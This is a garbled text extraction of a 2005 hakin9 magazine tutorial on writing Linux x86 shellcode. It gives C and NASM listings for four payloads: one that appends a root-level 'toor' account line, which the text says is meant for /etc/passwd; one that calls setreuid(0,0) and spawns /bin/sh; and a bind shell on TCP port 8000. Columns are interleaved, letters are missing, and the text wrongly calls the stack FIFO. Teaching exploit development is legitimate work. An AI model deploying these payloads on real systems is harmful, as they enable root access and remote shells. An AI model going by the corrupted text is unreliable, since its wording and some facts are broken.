2005.05_Linux shellcode optimisation_[Programming].pdf

(1339 KB) Pobierz
444104245 UNPDF
Linux shellcode
optimisation
Michał Piotrowski
A shellcode is an essential
part of any exploit. During
attack, it is injected into the
target application and performs
the desired actions within it.
However, the basic rules for
building shellcodes are not too
widely known, even though they
don't require advanced skills.
a bytecode ) is a sequence of com-
mands in machine code, constituting
a vital element of all buffer overlow exploits.
During attack, the exploit injects its shellcode
into a running application, causing it to execute
the intruder's commands within the target pro-
gram. The name shellcode originates from the
earliest codes of this type, whose purpose was
to bring up the system shell (in UNIX-based
system, the shell is the /bin/sh program). The
term currently encompasses all manner of
codes, performing a huge variety of actions.
Any shellcode has to fulill a number of re-
quirements. The irst is that it cannot contain
null bytes ( 0x00 ), since these signify the end of
a character string and terminate processing for
many functions commonly exploited for buffer
overlows – strcpy() , strcat() , sprintf() , gets()
etc. A shellcode must also be autonomous and
operate independently of its current address in
memory, so static addressing cannot be used.
Other features which can occasionally be sig-
niicant are the size and ASCII character set of
the shellcode.
Let's have a look at writing shellcodes in
practice. We will create four programs with
different functionality and then go on to modify
them so as to compact and adapt them for use
in actual exploits. Note that we will be looking
exclusively at shellcodes, not buffer overlow
attacks or writing exploits.
To create an operational shellcode, we'll
need a thorough understanding of assembly
language for the shellcode's target processor
(see Inset Registers and instructions ). We'll
be working on 32-bit x86 processors running
the Linux operating system with the 2.4 kernel
– all examples work with 2.6 series of Linux
kernel, too – so we have a choice of two main
assembler syntax conventions: AT&T and Intel.
What you will learn...
• how to write a working shellcode,
• how modify and compact it.
What you should know...
• you should be familiar with the Linux operating
system,
• the basics of programming in C and assem-
bler.
60
www.hakin9.org
hakin9 5/2005
~ t q w ~
A shellcode (sometimes also called
444104245.019.png 444104245.020.png
Linux shellcodes
Registers
and instructions
Registers (see Table 1) are small
memory cells within the CPU, used for
storing the numerical values required
by the processor during program ex-
ecution. In 32-bit x86 CPUs, the size
of the registers is 32 bits (4 bytes).
Registers can be divided according to
their purpose into data registers (EAX,
EBX, ECX, EDX) and address registers
(ESI, EDI, ESP, EBP, EIP).
Data registers are divided up into
smaller sections of 16 bits (AX, BX, CX,
DX) and 8 bits (AH, AL, BH, BL, CH,
CL, DH, DL). The smaller registers can
be used to decrease code size and get
rid of padding null bytes (see Figure 1).
Most of the address registers have their
own speciic uses and should not be
used for storing ordinary data.
Table 1. Registers in an x86 processor and their purposes
Register name Purpose
EAX, AX, AH, AL
– accumulator
Arithmetical operations, I/O operations and specify-
ing the required system call. Also holds the value
returned by a system call.
EBX, BX, BH, BL
– base register
Used for indirect memory addressing. Also holds
the irst argument of a system call.
ECX, CX, CH, CL
– counter
Typically used as a loop counter. Also holds the
second argument of a system call.
EDX, DX, DH, DL
– data register
Used to store variable addresses. Also holds the
third argument of a system call.
ESI – source ad-
dress, EDI – target
address
Typically used for manipulating long data sequenc-
es, including strings and arrays.
ESP – stack top
pointer
Holds the address of the top of the stack.
EBP – base pointer,
frame pointer
Holds the address of the bottom of the stack. Used
to refer to local variables stored in the current stack
frame.
Although AT&T syntax is used by the
majority of compilers and debuggers
(including gcc and gdb ), we will use
Intel syntax for its greater clarity. All
examples will be compiled using the
Netwide Assembler ( nasm ) version
0.98.35, available in most popular
Linux distributions. We will also use
the ndisasm and hexdump utilities.
Assembly language instructions
are basically symbolic processor
commands. There are quite many of
them, and the most important ones
can be divided into:
EIP – instruction
pointer
Holds the address of the next instruction to be
executed.
Table 2. Summary of the most useful assembler instructions
Instruction
Description
mov – move Copies the contents of one memory
segment into another: mov <target>,
<source> .
push – put value on the stack Copies the contents of a memory seg-
ment onto the stack: push <source> .
pop – get value from the stack Moves value from the stack into the speci-
ied memory segment: pop <target> .
add – arithmetic addition Adds the contents of one memory seg-
ment to another: add <target>, <source> .
sub – arithmetic subtraction Subtracts the contents of one memory
segment from another: sub <target>,
<source> .
• move instructions ( mov , push , pop ),
• arithmetical instructions ( add , sub ,
inc , neg , mul , div ),
• logical instructions ( and , or , xor ,
not ),
• control low instructions ( jmp , call ,
int , ret ),
xor – exclusive OR
Calculates the symmetric difference of
two speciied memory segments: xor
<target>, <source> .
jmp – jump
Writes the speciied address to the EIP
register: jmp <address> .
call – call
Works like jmp , but before writing to the
EIP register it puts the address of the next
instruction on the stack: call <address> .
lea – load address
Writes the address of the <source>
segment to the <target> segment: lea
<target>, <source> .
int – interrupt
Sends the speciied signal to the system
kernel, calling the interrupt with the speci-
ied number: int <value> .
Figure 1. Structure of the EAX
register
hakin9 5/2005
www.hakin9.org
~ t q w ~
61
444104245.021.png 444104245.022.png 444104245.001.png 444104245.002.png 444104245.003.png
Listing 1. The write.c ile
Listing 4. The bind.c ile
Our inal and most advanced pro-
gram is called bind (see Listing 4).
When executed, the program listens
on TCP port 8000 and upon receiv-
ing an incoming connection transfers
communication to a running shell.
This imitates the mode of operation
of typical exploits used against net-
work servers.
Figure 2 illustrates the compila-
tion process and the effect of running
the programs.
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
main ()
{
char * line = "hello, world! \n " ;
write ( 1 , line , strlen ( line ));
exit ( 0 );
}
int main ()
{
char * name [ 2 ];
int fd1 , fd2 ;
struct sockaddr_in serv ;
name [ 0 ] = "/bin/sh" ;
name [ 1 ] = NULL ;
serv . sin_addr . s_addr = 0 ;
serv . sin_port = htons ( 8000 );
serv . sin_family = AF_INET ;
fd1 = socket ( AF_INET ,
SOCK_STREAM , 0 );
bind ( fd1 , ( struct
sockaddr *)& serv , 16 );
listen ( fd1 , 1 );
fd2 = accept ( fd1 , 0 , 0 );
dup2 ( fd2 , 0 );
dup2 ( fd2 , 1 );
dup2 ( fd2 , 2 );
execve ( name [ 0 ] , name , NULL );
}
Listing 2. The add.c ile
#include <stdio.h>
#include <fcntl.h>
On to assembler
Now that we know our applications
are working as they should, we can
go on to rewriting them in assem-
bler. Our general aim is to execute
the same system functions as in
the C programs, but to do this we
need to know the system numbers
assigned to the functions. This
information can be obtained from
the /usr/include/asm/unistd.h ile
– the write() function is number
4, exit() is 1, open() is 5, close()
is 6, setreuid() is 70, execve() is
11 and dup2() is 63. Socket ma-
nipulation functions are a slightly
different story – socket() , bind() ,
listen() and accept() are all served
by the same system call socketcall
(number 102).
We also need to provide the
functions with the necessary argu-
ments. The irst program only uses
write() and exit() , so the matter is
simple. The write() function takes
three arguments: the target ile
descriptor, a pointer to source data
buffer and the number of charac-
ters to be written. The exit() func-
tion only takes one argument – the
exit status.
main ()
{
char * name = "/ile" ;
char * line =
"toor:x:0:0::/:/bin/bash \n " ;
int fd ;
fd = open ( name ,
O_WRONLY | O_APPEND );
write ( fd , line , strlen ( line ));
close ( fd );
exit ( 0 );
}
put, appending data to a ile, starting
the system shell and binding the
shell to a TCP port. We will start writ-
ing the programs in C, as it's much
easier to translate a ready program
into assembler than to write it in as-
sembler from scratch.
The irst program is simply called
write – Listing 1 presents its source
code. Its sole purpose is to write the
message stored in the line variable
to the standard output.
Listing 2 shows another program,
this time called add . Its purpose is to
open a ile called /ile in writeable
mode (the ile may be empty, but it
has to exist) and appending to it the
line toor:x:0:0::/:/bin/bash . In real-
ity we should be appending this en-
try to the /etc/passwd ile, but for the
time being it will be safer to refrain
from modifying the password ile.
The third program, called shell ,
is a classic shellcode. Its task is
to run /bin/sh after executing the
setreuid(0, 0) function to restore
system privileges to the running
process (this is necessary when
attacking the suid program, as this
casts away its system privileges for
security reasons). Listing 3 shows
the source of the shell program.
Listing 3. The shell.c ile
#include <stdio.h>
main ()
{
char * name [ 2 ];
name [ 0 ] = "/bin/sh" ;
name [ 1 ] = NULL ;
setreuid ( 0 , 0 );
execve ( name [ 0 ] ,
name , NULL );
}
• instructions for manipulating bits,
bytes and character strings ( shl ,
shr , rol , ror ),
• input/output instructions ( in , out ),
• lag control instructions.
Write
Listing 5 presents the source code
of the assembler equivalent of the
write program. Lines 1 and 4 con-
tain declarations for the data sec-
tion ( .data ) and code section ( .text ).
Line 6 marks the default ELF linker
entry point, which has to be a global
symbol due to the use of the ld linker
(line 5). Line 2 deines the msg vari-
able – a string of byte-size charac-
ters (the db parameter), terminated
We won't go into all the available
instructions, but rather we'll con-
centrate on just the ones we need.
Table 2 presents a brief summary of
the required instructions.
Building the shellcode
Our aim is to write four shellcodes,
performing four different operations:
writing a string to the standard out-
62
www.hakin9.org
hakin9 5/2005
~ t q w ~
444104245.004.png 444104245.005.png 444104245.006.png
 
444104245.007.png 444104245.008.png 444104245.009.png
Linux shellcodes
Listing 5. The write1.asm ile
1 : section . data
2 : msg db 'hello, world!' , 0x0a
3 :
4 : section . text
5 : global _start
6 : _start :
7 :
8 : ; write(1, msg, 14)
9 : mov eax , 4
10 : mov ebx , 1
11 : mov ecx , msg
12 : mov edx , 14
13 : int 0x80
14 :
15 : ; exit(0)
16 : mov eax , 1
17 : mov ebx , 0
18 : int 0x80
specify the function's two param-
eters:
• the address of the name variable,
stored in the EBX register;
• the value 1025 (the numeric
representation of the combined
O _ WRONLY and O _ APPEND lags),
stored in the ECX register.
Figure 2. Compilation and execution of the write, add, shell and bind
programs
After it is executed, the open() func-
tion returns its result (the descriptor
number for the opened ile) into the
EAX register. We'll need the descrip-
tor value to execute the write() and
close() functions, so in line 15 we
move it into the EBX register. Thus,
the next function to be called (i.e.
write() ) has its irst argument (the
descriptor number) in the right place
(the EBX register). Now we put 4 in
the EAX register and 24 (the length
of the appended line) in the ECX reg-
ister, and transfer execution to the
system kernel (line 21).
We then need to close /ile by
calling close() (the EAX register
should contain 6, while EBX still
holds the descriptor number for the
opened ile) and we can end the pro-
gram by calling exit() (with 1 in EAX
and 0 in EBX). Figure 4 presents the
compilation and execution of the
program.
with a line feed character ( 0x0a ).
Lines 8 and 15 are comments and
are ignored by the compiler. Lines
9–13 and 16–18 contain instructions
preparing and executing the write()
and exit() functions. Let's take
a closer look at them.
To start with, we write the value
of the system call to be executed into
the EAX register ( write is number 4)
and put the function arguments
into the appropriate registers: EBX
should contain the standard output
descriptor (number 1), ECX is illed
with the starting address of the
string to be written (stored in the
msg variable), and EDX holds the
string length (14 characters includ-
ing the line feed). We then execute
the instruction int 0x80 which takes
execution into kernel mode and ex-
ecutes the relevant system function.
The same mechanism applies to the
exit() function – we put its number
(1) in the EAX registry, write 0 to EBX
and enter kernel mode once again.
Figure 3 presents the compilation
and execution of our irst program
rewritten in assembler.
Add
Listing 6 shows the code of the
assembler rewrite of our second
program, add . As you can see, it is
slightly more complicated than the
previous example.
We start by declaring two char-
acter variables in the data section
name and line . They contain re-
spectively the name of the ile to be
modiied and the line we want to ap-
pend. Opening the ile /ile requires
us to put the value for the open()
function (5) in the EAX register and
Shell
The shell program needs to be rewrit-
ten in a similar way – Listing 7 shows
hakin9 5/2005
www.hakin9.org
~ t q w ~
63
444104245.010.png 444104245.011.png
Figure 3. Effect of executing the write1 program
called (1 for socket() , 2 for bind() , 4
for listen() and 5 for accept() ) and
the address of the memory segment
containing arguments for the subrou-
tine. Let's have a closer look at how
the socket() (lines 9–16) and bind()
(lines 21–35) functions are called.
As you can see in Listing 4,
socket() takes three arguments:
• protocol family ( AF _ INET – Inter-
net protocols),
• protocol type ( SOCK _ STREAM
– connection protocol),
• the protocol itself (0 – TCP).
Figure 4. Effect of executing the add1 program
We need to store the arguments
somewhere in memory – the best
place will be the stack (lines 9–11),
but we'll need to push values onto
the stack in reverse order, since a
stack is a FIFO list, so values are re-
trieved from last to irst. Starting with
line 9, we push the third argument
onto the stack (0), then the second
(1 – SOCK _ STREAM ) and inally the irst
(2 – AF _ INET ). Once that's done, we
can specify arguments for the call to
socketcall() :
the resulting source code. We won't go
into detail over it, but rather we'll take
a closer look at the seemingly complex
execve() function call (lines 15–21).
The irst argument of the
execve() function is the character
string (line 16) specifying the path
to the executed program ( /bin/sh ).
The second argument is an array
containing at least two elements:
the path string and a NULL value. To
prepare this array, we must resort
to using the stack, irst putting the
second array element on the stack
( NULL – line 17) and then the irst ele-
ment (the address of the name string
– line 18). Then we set the second
function argument (line 19) using
the ESP register, which holds the
address of the top of the stack and
therefore the starting address of
our array. The third and inal argu-
ment is handled simply by loading
0 into the EDX register (as shown in
line 20). The complete program is
compiled and run just like our other
programs.
Listing 6. The add1.asm ile
1 : section . data
2 : name db '/ ile ', 0
3 : line db
' toor : x : 0 : 0 ::/:/ bin / bash ',
0x0a
4 :
5 : section . text
6 : global _start
7 : _start :
8 :
9 : ; open(name,
O_WRONLY|O_APPEND)
10 : mov eax , 5
11 : mov ebx , name
12 : mov ecx , 1025
13 : int 0x80
14 :
15 : mov ebx , eax
16 :
17 : ; write(fd, line, 24)
18 : mov eax , 4
19 : mov ecx , line
20 : mov edx , 24
21 : int 0x80
22 :
23 : ; close(fd)
24 : mov eax , 6
25 : int 0x80
26 :
27 : ; exit(0)
28 : mov eax , 1
29 : mov ebx , 0
30 : int 0x80
• load 102 into EAX (line 13),
• load EBX with the socket() sub-
routine number (line 14),
• load ECX with the address of
socket() subroutine arguments
Listing 7. The shell1.asm ile
1 : section . data
2 : name db '/bin/sh' , 0
3 :
4 : section . text
5 : global _start
6 : _start :
7 :
8 : ; setreuid(0, 0)
9 : mov eax , 70
10 : mov ebx , 0
11 : mov ecx , 0
12 : int 0x80
13 :
14 : ; execve("/bin/sh",
["/bin/sh", NULL], NULL)
15 : mov eax , 11
16 : mov ebx , name
17 : push 0
18 : push name
19 : mov ecx , esp
20 : mov edx , 0
21 : int 0x80
Bind
The last of our shellcodes is the most
complicated and requires a more de-
tailed explanation due to the speciic
way of calling socket functions. List-
ing 8 presents the assembler version
of the bind program.
The socket() , bind() , listen()
and accept() functions are served
by the same system call ( socket-
call ), which takes two arguments:
the number of the subroutine to be
64
www.hakin9.org
hakin9 5/2005
~ t q w ~
444104245.012.png 444104245.013.png 444104245.014.png
 
444104245.015.png 444104245.016.png 444104245.017.png 444104245.018.png
Zgłoś jeśli naruszono regulamin